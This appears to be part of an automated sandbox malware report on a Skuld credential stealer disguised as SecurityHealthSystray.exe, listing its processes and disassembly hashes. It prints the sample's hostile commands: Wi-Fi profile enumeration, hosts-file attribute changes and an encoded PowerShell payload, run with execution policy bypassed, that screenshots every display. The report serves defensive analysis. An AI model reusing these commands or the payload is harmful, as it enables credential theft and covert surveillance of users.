                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:13
                                                                                    Start time:15:25:12
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
                                                                                    Imagebase:0x280000
                                                                                    File size:3'469'824 bytes
                                                                                    MD5 hash:2B344D8644F0D502C4C8370EF8674A51
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GoStealer, Description: Yara detected Go Stealer, Source: 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 55%, ReversingLabs
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:14
                                                                                    Start time:15:25:13
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff70f010000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:15
                                                                                    Start time:15:25:15
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:wmic csproduct get UUID
                                                                                    Imagebase:0x7ff7e3f60000
                                                                                    File size:576'000 bytes
                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:17
                                                                                    Start time:15:25:18
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\netsh.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:netsh wlan show profiles
                                                                                    Imagebase:0x7ff64fa90000
                                                                                    File size:96'768 bytes
                                                                                    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:18
                                                                                    Start time:15:25:18
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                    Imagebase:0x7ff760310000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:19
                                                                                    Start time:15:25:20
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline"
                                                                                    Imagebase:0x7ff6b43e0000
                                                                                    File size:2'759'232 bytes
                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:20
                                                                                    Start time:15:25:21
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41CB.tmp" "c:\Users\user\AppData\Local\Temp\a12sgnvo\CSC12900879E4FA4A8799F1D0272636A686.TMP"
                                                                                    Imagebase:0x7ff6205f0000
                                                                                    File size:52'744 bytes
                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:22
                                                                                    Start time:15:25:21
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
                                                                                    Imagebase:0x280000
                                                                                    File size:3'469'824 bytes
                                                                                    MD5 hash:2B344D8644F0D502C4C8370EF8674A51
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GoStealer, Description: Yara detected Go Stealer, Source: 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:23
                                                                                    Start time:15:25:21
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff70f010000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:25
                                                                                    Start time:15:25:25
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                    Imagebase:0x7ff77c430000
                                                                                    File size:23'040 bytes
                                                                                    MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:26
                                                                                    Start time:15:25:25
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                    Imagebase:0x7ff77c430000
                                                                                    File size:23'040 bytes
                                                                                    MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Executed Functions

                                                                                      Function 00007FF8878AED40 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1610187383.00007FF8878AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8878AD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff8878ad000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xrf
                                                                                      • API String ID: 0-3219120036
                                                                                      • Opcode ID: bac888e692075486a68d581071aa666bf7500a38257ffcbc4f8d9ed0148dc684
                                                                                      • Instruction ID: c9c8e159e50eb7fc160c83143b508a7a3325e3a918fbce0e0c26da9a06580b0f
                                                                                      • Opcode Fuzzy Hash: bac888e692075486a68d581071aa666bf7500a38257ffcbc4f8d9ed0148dc684
                                                                                      • Instruction Fuzzy Hash: 6941E03040DBC44FE7569B2C98469567FF0FF56360F1906DFD488CB1A3D629A84AC7A2
                                                                                      Function 00007FF887A9693A Relevance: .5, Instructions: 466COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1611995859.00007FF887A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff887a90000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1466a4581db15a584ffb6180bc3e2b1bb4aa9725413df4fc15fa6abf064afab3
                                                                                      • Instruction ID: 2e349164b0602a6b937eb4e6e2fffb17288c7c09c0228a648404790349b967a9
                                                                                      • Opcode Fuzzy Hash: 1466a4581db15a584ffb6180bc3e2b1bb4aa9725413df4fc15fa6abf064afab3
                                                                                      • Instruction Fuzzy Hash: 9FE11221E8DA8A4FE7A59B6848566BD7BF4FF16390F1800BED45DCB0D3E918AC15C342
                                                                                      Function 00007FF8879CB1B8 Relevance: .4, Instructions: 362COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1611066948.00007FF8879C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff8879c0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d69389c53610882c9283983367a640ce24a73b4a2ec8e63cf8791562713c813
                                                                                      • Instruction ID: b4a686445a175e1b4ba3a26055717aa340eb67c38a2e35d0ee69177963bb102a
                                                                                      • Opcode Fuzzy Hash: 6d69389c53610882c9283983367a640ce24a73b4a2ec8e63cf8791562713c813
                                                                                      • Instruction Fuzzy Hash: B9B12730A1CB898FDB49DF5CC8896B9BBE1FFA5351F14017ED08AC3196DA25E846CB41
                                                                                      Function 00007FF8879C96EC Relevance: .1, Instructions: 117COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1611066948.00007FF8879C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff8879c0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b9df75ed0def77c3d184089e00fd572e48129a1156e16ac70096c60f21ad3ff1
                                                                                      • Instruction ID: 6a6cab10ecec35c4553baf8032e822f01787e438fd6f310098d657ed50775d29
                                                                                      • Opcode Fuzzy Hash: b9df75ed0def77c3d184089e00fd572e48129a1156e16ac70096c60f21ad3ff1
                                                                                      • Instruction Fuzzy Hash: C631B53191CB4C8FDB18DB5CE84A6A97BE0FBA9321F00422FE449D3251DA74A855CBC2
                                                                                      Function 00007FF8879C33B5 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1611066948.00007FF8879C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff8879c0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                      • Instruction ID: 80c339db5053e7109d13471cab3f0864c0d04894e0694a21a396f2bc2b17e419
                                                                                      • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                      • Instruction Fuzzy Hash: 3201A77011CB0D8FDB44EF0CE455AA5B3E0FB85360F10056DE58AC3691DA36E882CB42
                                                                                      Function 00007FF8879CA048 Relevance: .0, Instructions: 40COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1611066948.00007FF8879C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff8879c0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 08941dd3f55dc7bcc6f6724ca227613f5b6fa4182a7c29c6c77316343bbf6fd0
                                                                                      • Instruction ID: e7e4a14345747c42e2b2562599ed01f3cba5c0604b295ae7b359848abd15b2c6
                                                                                      • Opcode Fuzzy Hash: 08941dd3f55dc7bcc6f6724ca227613f5b6fa4182a7c29c6c77316343bbf6fd0
                                                                                      • Instruction Fuzzy Hash: A5F096718486C98FDB06DF789C195D97FB0FF56351B08029AD458C70A2DB649458C782
                                                                                      Function 00007FF887A9447D Relevance: .0, Instructions: 37COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1611995859.00007FF887A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff887a90000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: acf6ee97e57a173ed47a51b3249e586087252932210a9c63176644753dc5cf00
                                                                                      • Instruction ID: c99be882bbff0b5d5f4ad86877655452de9af65f25cca90e573e01700984cf08
                                                                                      • Opcode Fuzzy Hash: acf6ee97e57a173ed47a51b3249e586087252932210a9c63176644753dc5cf00
                                                                                      • Instruction Fuzzy Hash: 21F0BE32A4C6488FD699EB4CE8025EC73E0FF8432071100BAE16DCB1A3CA29EC50C741
                                                                                      Function 00007FF887A94730 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1611995859.00007FF887A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff887a90000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1e8fb81510c1ae1f0068b64260ca471afd46af97a29cd267eec167578406d355
                                                                                      • Instruction ID: e0a2528004377ed8eb43903e679fabd063ff1131a3d0980467924c2bb41d0fe4
                                                                                      • Opcode Fuzzy Hash: 1e8fb81510c1ae1f0068b64260ca471afd46af97a29cd267eec167578406d355
                                                                                      • Instruction Fuzzy Hash: 5FF0BE31E4C5488FEA94EB4CE4425E873F0FF4532071100B6E129CB153CA29EC50CB41

                                                                                      Non-executed Functions

                                                                                      Function 00007FF8879C0825 Relevance: 6.4, Strings: 5, Instructions: 168COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1611066948.00007FF8879C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff8879c0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 8,e$H1e$l;[$-e$/e
                                                                                      • API String ID: 0-1384525797
                                                                                      • Opcode ID: 8fb96a2ff55fe7d0b2a907e769c4702d83f4c78896709a41451b8929f956f157
                                                                                      • Instruction ID: d0aaf81129c809466b9cc87c406cdc33de1c5f9cbedb004ef32ac760d27e5d89
                                                                                      • Opcode Fuzzy Hash: 8fb96a2ff55fe7d0b2a907e769c4702d83f4c78896709a41451b8929f956f157
                                                                                      • Instruction Fuzzy Hash: EC518052D8E6C39FF71686780C29269AFB1BF53790B5C45FEC4E88A097E60D9918C381
                                                                                      Function 00007FF8879C1FF2 Relevance: 5.4, Strings: 4, Instructions: 386COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1611066948.00007FF8879C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff8879c0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !L_^$"L_^$#L_^$8Dy
                                                                                      • API String ID: 0-2397290002
                                                                                      • Opcode ID: c1347bc24c745649f6c3fd02c66fe925429994eb5101fd1895797324a25d5174
                                                                                      • Instruction ID: e90ebb7c0df136c0ae2712d240220bf1d7cefcdf847183a1b3d0f194fc3e1b89
                                                                                      • Opcode Fuzzy Hash: c1347bc24c745649f6c3fd02c66fe925429994eb5101fd1895797324a25d5174
                                                                                      • Instruction Fuzzy Hash: D3C17863D8D6C39AEB175A386C6A1E97FB0FF936A471900F7C0848B0A7D91D2496C351
                                                                                      Function 00007FF8879C03C8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1611066948.00007FF8879C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ff8879c0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @Je$I$^$x.e
                                                                                      • API String ID: 0-489143813
                                                                                      • Opcode ID: bf30e5d758f5d9c2addcd4a85767beae3b1dcce78591c9dc1db332b33356667e
                                                                                      • Instruction ID: 4648bdb275f29a8cc5938f3516eb34160ecfe6862a5c8cd383937adab16aeed2
                                                                                      • Opcode Fuzzy Hash: bf30e5d758f5d9c2addcd4a85767beae3b1dcce78591c9dc1db332b33356667e
                                                                                      • Instruction Fuzzy Hash: AC31A152C4E6D24FE7564A6C2C1927A6F71BF82B94F1C40FBC0988F0DBE94DA948C342

                                                                                      Executed Functions

                                                                                      Function 00007FF887A817DE Relevance: .8, Instructions: 790COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.1743055094.00007FF887A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ff887a80000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1ec1147203035398798ac1005da7d186be3115c1760d25032a79c0cc0d69d3f9
                                                                                      • Instruction ID: 41386f4cfde08d48b49c45524f227a3c4c54e92b3450affa06a669e2c8b24e01
                                                                                      • Opcode Fuzzy Hash: 1ec1147203035398798ac1005da7d186be3115c1760d25032a79c0cc0d69d3f9
                                                                                      • Instruction Fuzzy Hash: 91321821E5DB8A4FE3A69768A8562B97BF1FF56250B0901FFD04DC7193E92C9C06C342
                                                                                      Function 00007FF8879B45F3 Relevance: .7, Instructions: 711COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.1742089279.00007FF8879B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ff8879b0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 31cb751080300ae1bf856216ddb2446589a0ec6ffcd0aa41f2427161a2738c0f
                                                                                      • Instruction ID: cd0c4c72c8f663a2384c910335f46b4145a86ddf258968fdbe4a21a015795e6d
                                                                                      • Opcode Fuzzy Hash: 31cb751080300ae1bf856216ddb2446589a0ec6ffcd0aa41f2427161a2738c0f
                                                                                      • Instruction Fuzzy Hash: 5061A370E09A598FDB59DBACD8556EC7BF1FF49310F14406ED049D72A2CB39A842CB81
                                                                                      Function 00007FF8879B3945 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.1742089279.00007FF8879B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ff8879b0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                      • Instruction ID: 15dd9b60c6169c859de73191573b94f2a9dda3fac5984570e4b78192f630d007
                                                                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                      • Instruction Fuzzy Hash: 7601A77011CB0D8FD744EF0CE455AA5B3E0FB85360F10056DE58AC3691D636E881CB42

                                                                                      Non-executed Functions

                                                                                      Function 00007FF8879B0810 Relevance: 8.9, Strings: 7, Instructions: 124COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.1742089279.00007FF8879B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ff8879b0000_powershell.jbxd
